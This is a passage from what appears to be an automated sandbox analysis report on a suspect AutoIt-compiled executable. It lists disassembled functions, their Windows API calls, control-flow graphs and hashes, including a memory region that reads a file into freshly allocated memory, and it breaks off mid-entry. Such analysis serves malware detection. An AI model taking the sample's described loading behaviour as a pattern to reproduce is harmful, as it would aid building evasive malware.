                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                            • String ID: H
                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                            • Opcode ID: 3d03c06b991e806b85997279e62702ab0af8892792a83a4b75fb50ed2ce1cd11
                                                                                                            • Instruction ID: 7773c06a441558f8d5c3ed7687005594be093c059b0c80e8136104c2a2d3b3d3
                                                                                                            • Opcode Fuzzy Hash: 3d03c06b991e806b85997279e62702ab0af8892792a83a4b75fb50ed2ce1cd11
                                                                                                            • Instruction Fuzzy Hash: 25A11632A141049FDF29AF68E851BAD7FA1EB06320F184159F815EB3D2D7319817CBB1
                                                                                                            Function 00D5344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 00D53A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E21418,?,00D52E7F,?,?,?,00000000), ref: 00D53A78
                                                                                                              • Part of subcall function 00D53357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D53379
                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D5356A
                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D9318D
                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D931CE
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00D93210
                                                                                                            • _wcslen.LIBCMT ref: 00D93277
                                                                                                            • _wcslen.LIBCMT ref: 00D93286
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                            • API String ID: 98802146-2727554177
                                                                                                            • Opcode ID: a4eec9894bdcc61aba92cbd6ae97c014b797a2fed54505f72b8de9be749e3ef0
                                                                                                            • Instruction ID: ead3a558c654f5e30b565be1dbcf6671896bd4dd2e9dfbca57e2d9c2886bf8ea
                                                                                                            • Opcode Fuzzy Hash: a4eec9894bdcc61aba92cbd6ae97c014b797a2fed54505f72b8de9be749e3ef0
                                                                                                            • Instruction Fuzzy Hash: 7E717271404302AEC724EF6AEC8196BBBE8FF95350F40452DFA45A7161EB309A4DCB72
                                                                                                            Function 00D52B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00D52B8E
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00D52B9D
                                                                                                            • LoadIconW.USER32(00000063), ref: 00D52BB3
                                                                                                            • LoadIconW.USER32(000000A4), ref: 00D52BC5
                                                                                                            • LoadIconW.USER32(000000A2), ref: 00D52BD7
                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D52BEF
                                                                                                            • RegisterClassExW.USER32(?), ref: 00D52C40
                                                                                                              • Part of subcall function 00D52CD4: GetSysColorBrush.USER32(0000000F), ref: 00D52D07
                                                                                                              • Part of subcall function 00D52CD4: RegisterClassExW.USER32(00000030), ref: 00D52D31
                                                                                                              • Part of subcall function 00D52CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D52D42
                                                                                                              • Part of subcall function 00D52CD4: InitCommonControlsEx.COMCTL32(?), ref: 00D52D5F
                                                                                                              • Part of subcall function 00D52CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D52D6F
                                                                                                              • Part of subcall function 00D52CD4: LoadIconW.USER32(000000A9), ref: 00D52D85
                                                                                                              • Part of subcall function 00D52CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D52D94
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                            • API String ID: 423443420-4155596026
                                                                                                            • Opcode ID: 9f1d7efc1754b5e93e450e4353c3bed4494fec73efddcab52da0b0e4057172a1
                                                                                                            • Instruction ID: b579bec9cdfafe486d9c0681b3ad64d11bb1c15c1d5450a69253391720967541
                                                                                                            • Opcode Fuzzy Hash: 9f1d7efc1754b5e93e450e4353c3bed4494fec73efddcab52da0b0e4057172a1
                                                                                                            • Instruction Fuzzy Hash: 11213070D10354AFDB21EF96EC85B997FB5FB18B50F1100AAE500B67A0D3B1064ACF90
                                                                                                            Function 00D53170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 443 d53170-d53185 444 d531e5-d531e7 443->444 445 d53187-d5318a 443->445 444->445 446 d531e9 444->446 447 d5318c-d53193 445->447 448 d531eb 445->448 449 d531d0-d531d8 DefWindowProcW 446->449 452 d53265-d5326d PostQuitMessage 447->452 453 d53199-d5319e 447->453 450 d92dfb-d92e23 call d518e2 call d6e499 448->450 451 d531f1-d531f6 448->451 459 d531de-d531e4 449->459 489 d92e28-d92e2f 450->489 454 d5321d-d53244 SetTimer RegisterWindowMessageW 451->454 455 d531f8-d531fb 451->455 460 d53219-d5321b 452->460 457 d531a4-d531a8 453->457 458 d92e7c-d92e90 call dbbf30 453->458 454->460 464 d53246-d53251 CreatePopupMenu 454->464 461 d53201-d53214 KillTimer call d530f2 call d53c50 455->461 462 d92d9c-d92d9f 455->462 465 d92e68-d92e72 call dbc161 457->465 466 d531ae-d531b3 457->466 458->460 484 d92e96 458->484 460->459 461->460 468 d92da1-d92da5 462->468 469 d92dd7-d92df6 MoveWindow 462->469 464->460 480 d92e77 465->480 473 d92e4d-d92e54 466->473 474 d531b9-d531be 466->474 476 d92da7-d92daa 468->476 477 d92dc6-d92dd2 SetFocus 468->477 469->460 473->449 478 d92e5a-d92e63 call db0ad7 473->478 482 d531c4-d531ca 474->482 483 d53253-d53263 call d5326f 474->483 476->482 485 d92db0-d92dc1 call d518e2 476->485 477->460 478->449 480->460 482->449 482->489 483->460 484->449 485->460 489->449 493 d92e35-d92e48 call d530f2 call d53837 489->493 493->449
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D5316A,?,?), ref: 00D531D8
                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00D5316A,?,?), ref: 00D53204
                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D53227
                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D5316A,?,?), ref: 00D53232
                                                                                                            • CreatePopupMenu.USER32 ref: 00D53246
                                                                                                            • PostQuitMessage.USER32(00000000), ref: 00D53267
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                            • String ID: TaskbarCreated
                                                                                                            • API String ID: 129472671-2362178303
                                                                                                            • Opcode ID: a46f732d1717eb113928ecde86e43e4c408a6e724c7599ca40965eff9c20b42b
                                                                                                            • Instruction ID: 681e2b863e3056e538c3138be204fa7b750b6058b14595c4f0b6e669864e1c02
                                                                                                            • Opcode Fuzzy Hash: a46f732d1717eb113928ecde86e43e4c408a6e724c7599ca40965eff9c20b42b
                                                                                                            • Instruction Fuzzy Hash: 1F417630210704BBDF246B789C4AB793A19FB553C2F080125FD42EA2A1CB70CB4E87B5
                                                                                                            Function 00D5DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                                                                                                            • API String ID: 0-2799515523
                                                                                                            • Opcode ID: 5bbb72c1cbee14478968c192ab87966c6febf0e8f1a7a032a9a389bd5fe50e78
                                                                                                            • Instruction ID: 20fd9fc933256e99defdb59f1ca84a1dbd121e6332d5d64ca9ae5f7a858a706e
                                                                                                            • Opcode Fuzzy Hash: 5bbb72c1cbee14478968c192ab87966c6febf0e8f1a7a032a9a389bd5fe50e78
                                                                                                            • Instruction Fuzzy Hash: 79C27A71A002158FCF28EF58C880AADB7B2FF09311F288559ED55AB291D375EE45CBB1
                                                                                                            Function 00D88D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1009 d88d45-d88d55 1010 d88d6f-d88d71 1009->1010 1011 d88d57-d88d6a call d7f2c6 call d7f2d9 1009->1011 1013 d890d9-d890e6 call d7f2c6 call d7f2d9 1010->1013 1014 d88d77-d88d7d 1010->1014 1027 d890f1 1011->1027 1032 d890ec call d827ec 1013->1032 1014->1013 1017 d88d83-d88dae 1014->1017 1017->1013 1020 d88db4-d88dbd 1017->1020 1023 d88dbf-d88dd2 call d7f2c6 call d7f2d9 1020->1023 1024 d88dd7-d88dd9 1020->1024 1023->1032 1025 d88ddf-d88de3 1024->1025 1026 d890d5-d890d7 1024->1026 1025->1026 1030 d88de9-d88ded 1025->1030 1031 d890f4-d890f9 1026->1031 1027->1031 1030->1023 1034 d88def-d88e06 1030->1034 1032->1027 1037 d88e08-d88e0b 1034->1037 1038 d88e23-d88e2c 1034->1038 1040 d88e0d-d88e13 1037->1040 1041 d88e15-d88e1e 1037->1041 1042 d88e4a-d88e54 1038->1042 1043 d88e2e-d88e45 call d7f2c6 call d7f2d9 call d827ec 1038->1043 1040->1041 1040->1043 1044 d88ebf-d88ed9 1041->1044 1046 d88e5b-d88e79 call d83820 call d829c8 * 2 1042->1046 1047 d88e56-d88e58 1042->1047 1075 d8900c 1043->1075 1048 d88fad-d88fb6 call d8f89b 1044->1048 1049 d88edf-d88eef 1044->1049 1078 d88e7b-d88e91 call d7f2d9 call d7f2c6 1046->1078 1079 d88e96-d88ebc call d89424 1046->1079 1047->1046 1062 d88fb8-d88fca 1048->1062 1063 d89029 1048->1063 1049->1048 1052 d88ef5-d88ef7 1049->1052 1052->1048 1056 d88efd-d88f23 1052->1056 1056->1048 1060 d88f29-d88f3c 1056->1060 1060->1048 1065 d88f3e-d88f40 1060->1065 1062->1063 1068 d88fcc-d88fdb GetConsoleMode 1062->1068 1067 d8902d-d89045 ReadFile 1063->1067 1065->1048 1070 d88f42-d88f6d 1065->1070 1072 d890a1-d890ac GetLastError 1067->1072 1073 d89047-d8904d 1067->1073 1068->1063 1074 d88fdd-d88fe1 1068->1074 1070->1048 1077 d88f6f-d88f82 1070->1077 1080 d890ae-d890c0 call d7f2d9 call d7f2c6 1072->1080 1081 d890c5-d890c8 1072->1081 1073->1072 1082 d8904f 1073->1082 1074->1067 1083 d88fe3-d88ffd ReadConsoleW 1074->1083 1076 d8900f-d89019 call d829c8 1075->1076 1076->1031 1077->1048 1089 d88f84-d88f86 1077->1089 1078->1075 1079->1044 1080->1075 1086 d890ce-d890d0 1081->1086 1087 d89005-d8900b call d7f2a3 1081->1087 1093 d89052-d89064 1082->1093 1084 d8901e-d89027 1083->1084 1085 d88fff GetLastError 1083->1085 1084->1093 1085->1087 1086->1076 1087->1075 1089->1048 1096 d88f88-d88fa8 1089->1096 1093->1076 1100 d89066-d8906a 1093->1100 1096->1048 1104 d8906c-d8907c call d88a61 1100->1104 1105 d89083-d8908e 1100->1105 1114 d8907f-d89081 1104->1114 1107 d8909a-d8909f call d888a1 1105->1107 1108 d89090 call d88bb1 1105->1108 1115 d89095-d89098 1107->1115 1108->1115 1114->1076 1115->1114
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 986ba052033020c16c18b1f24c975b924f06cb247f53ab39ecf0d976f2f3c7b8
                                                                                                            • Instruction ID: 0ca14fdb91867ce1214c00db8b6e21661f735e0b6e41cd1f43eaca6bc2e33cc5
                                                                                                            • Opcode Fuzzy Hash: 986ba052033020c16c18b1f24c975b924f06cb247f53ab39ecf0d976f2f3c7b8
                                                                                                            • Instruction Fuzzy Hash: DFC1D274A04249AFDB21FFA8C851BBDBBB4AF49310F1C4199F995A7392C7309942CB71
                                                                                                            Function 015D6650 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1117 15d6650-15d66a2 call 15d6550 CreateFileW 1120 15d66ab-15d66b8 1117->1120 1121 15d66a4-15d66a6 1117->1121 1124 15d66cb-15d66e2 VirtualAlloc 1120->1124 1125 15d66ba-15d66c6 1120->1125 1122 15d6804-15d6808 1121->1122 1126 15d66eb-15d6711 CreateFileW 1124->1126 1127 15d66e4-15d66e6 1124->1127 1125->1122 1129 15d6735-15d674f ReadFile 1126->1129 1130 15d6713-15d6730 1126->1130 1127->1122 1131 15d6751-15d676e 1129->1131 1132 15d6773-15d6777 1129->1132 1130->1122 1131->1122 1133 15d6779-15d6796 1132->1133 1134 15d6798-15d67af WriteFile 1132->1134 1133->1122 1137 15d67da-15d67ff CloseHandle VirtualFree 1134->1137 1138 15d67b1-15d67d8 1134->1138 1137->1122 1138->1122
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015D6695
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                            • Instruction ID: 3e59df584e5965a473c7dfa3bca6388e551bdd60089b56720cd262951f82e17a
                                                                                                            • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                                                                            • Instruction Fuzzy Hash: 7951C675A50208FBEB30DFA8CC49FDE77B8BF48711F108954F61AEA180DA74A6458B64
                                                                                                            Function 00D52C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1157 d52c63-d52cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D52C91
                                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D52CB2
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D51CAD,?), ref: 00D52CC6
                                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D51CAD,?), ref: 00D52CCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CreateShow
                                                                                                            • String ID: AutoIt v3$edit
                                                                                                            • API String ID: 1584632944-3779509399
                                                                                                            • Opcode ID: 37e91d962efa24f849b9f6634282c967a0fddfdc58740c8f6a4cf7cbdcaaf0af
                                                                                                            • Instruction ID: d798daa82f4d8aad47fe2899cae02927c3b89fce4bb0e5025c0df55ee2c2e2d7
                                                                                                            • Opcode Fuzzy Hash: 37e91d962efa24f849b9f6634282c967a0fddfdc58740c8f6a4cf7cbdcaaf0af
                                                                                                            • Instruction Fuzzy Hash: 64F030755503D87EE73067136C48F7B2E7ED7DAF50B0210A9F900A6260C2710846DE70
                                                                                                            Function 00DC2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1272 dc2947-dc29b9 call d91f50 call dc25d6 call d6fe0b call d55722 call dc274e call d5511f call d75232 1287 dc2a6c-dc2a73 call dc2e66 1272->1287 1288 dc29bf-dc29c6 call dc2e66 1272->1288 1293 dc2a7c 1287->1293 1294 dc2a75-dc2a77 1287->1294 1288->1294 1295 dc29cc-dc2a6a call d7d583 call d74983 call d79038 call d7d583 call d79038 * 2 1288->1295 1298 dc2a7f-dc2b3a call d550f5 * 8 call dc3017 call d7e5eb 1293->1298 1296 dc2cb6-dc2cb7 1294->1296 1295->1298 1299 dc2cd5-dc2cdb 1296->1299 1337 dc2b3c-dc2b3e 1298->1337 1338 dc2b43-dc2b5e call dc2792 1298->1338 1302 dc2cdd-dc2ced call d6fdcd call d6fe14 1299->1302 1303 dc2cf0-dc2cf6 1299->1303 1302->1303 1337->1296 1341 dc2b64-dc2b6c 1338->1341 1342 dc2bf0-dc2bfc call d7e678 1338->1342 1343 dc2b6e-dc2b72 1341->1343 1344 dc2b74 1341->1344 1349 dc2bfe-dc2c0d DeleteFileW 1342->1349 1350 dc2c12-dc2c16 1342->1350 1346 dc2b79-dc2b97 call d550f5 1343->1346 1344->1346 1356 dc2b99-dc2b9e 1346->1356 1357 dc2bc1-dc2bd7 call dc211d call d7dbb3 1346->1357 1349->1296 1352 dc2c18-dc2c7e call dc25d6 call d7d2eb * 2 call dc22ce 1350->1352 1353 dc2c91-dc2ca5 CopyFileW 1350->1353 1354 dc2cb9-dc2ccf DeleteFileW call dc2fd8 1352->1354 1377 dc2c80-dc2c8f DeleteFileW 1352->1377 1353->1354 1355 dc2ca7-dc2cb4 DeleteFileW 1353->1355 1364 dc2cd4 1354->1364 1355->1296 1361 dc2ba1-dc2bb4 call dc28d2 1356->1361 1371 dc2bdc-dc2be7 1357->1371 1372 dc2bb6-dc2bbf 1361->1372 1364->1299 1371->1341 1374 dc2bed 1371->1374 1372->1357 1374->1342 1377->1296
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2C05
                                                                                                            • DeleteFileW.KERNEL32(?), ref: 00DC2C87
                                                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DC2C9D
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2CAE
                                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2CC0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Delete$Copy
                                                                                                            • String ID:
                                                                                                            • API String ID: 3226157194-0
                                                                                                            • Opcode ID: 95180b97c1fa96753ca3b3e6735f37a164b169ed9c13bb1ad06776699f07906f
                                                                                                            • Instruction ID: 16b4a0447572d28ac96ca19a7f947b2cfbbcd7745f0eb0f1302ebcf19b8ab649
                                                                                                            • Opcode Fuzzy Hash: 95180b97c1fa96753ca3b3e6735f37a164b169ed9c13bb1ad06776699f07906f
                                                                                                            • Instruction Fuzzy Hash: 33B13E72D00119ABDF21DBA4CD85EEEBB7DEF49350F1040AAFA09E7155EA309A448F71
                                                                                                            Function 015D80E0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 160fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1378 15d80e0-15d8231 call 15d5d30 call 15d7fd0 CreateFileW 1385 15d8238-15d8248 1378->1385 1386 15d8233 1378->1386 1389 15d824f-15d8269 VirtualAlloc 1385->1389 1390 15d824a 1385->1390 1387 15d8305-15d830a 1386->1387 1391 15d826b 1389->1391 1392 15d8270-15d8287 ReadFile 1389->1392 1390->1387 1391->1387 1393 15d8289 1392->1393 1394 15d828b-15d82a0 call 15d6da0 1392->1394 1393->1387 1396 15d82a5-15d82df call 15d8010 call 15d6fd0 1394->1396 1401 15d82fb-15d8303 1396->1401 1402 15d82e1-15d82f6 call 15d8060 1396->1402 1401->1387 1402->1401
                                                                                                            APIs
                                                                                                              • Part of subcall function 015D7FD0: Sleep.KERNELBASE(000001F4), ref: 015D7FE1
                                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015D8227
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1734196376.00000000015D5000.00000040.00000020.00020000.00000000.sdmp, Offset: 015D5000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_15d5000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFileSleep
                                                                                                            • String ID: 49ZD3PGV7O3AI611SQ732TE5SZZLP0
                                                                                                            • API String ID: 2694422964-1987587173
                                                                                                            • Opcode ID: 6d00ad7ddeb0777e5ff48531ef5c71ce2a4f5494a561b388c2187e8d02c839cd
                                                                                                            • Instruction ID: cb9abb31c6f54b54f2ed17a08ad87e725882bcf898850cbc574b4bcdf4333ffb
                                                                                                            • Opcode Fuzzy Hash: 6d00ad7ddeb0777e5ff48531ef5c71ce2a4f5494a561b388c2187e8d02c839cd
                                                                                                            • Instruction Fuzzy Hash: CA619730D14289DAEF11DBB8C854BDFBBB4AF15304F044199D6487B2C1D7B91B49CB66
                                                                                                            Function 00D53B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1441 d53b1c-d53b27 1442 d53b99-d53b9b 1441->1442 1443 d53b29-d53b2e 1441->1443 1445 d53b8c-d53b8f 1442->1445 1443->1442 1444 d53b30-d53b48 RegOpenKeyExW 1443->1444 1444->1442 1446 d53b4a-d53b69 RegQueryValueExW 1444->1446 1447 d53b80-d53b8b RegCloseKey 1446->1447 1448 d53b6b-d53b76 1446->1448 1447->1445 1449 d53b90-d53b97 1448->1449 1450 d53b78-d53b7a 1448->1450 1451 d53b7e 1449->1451 1450->1451 1451->1447
                                                                                                            APIs
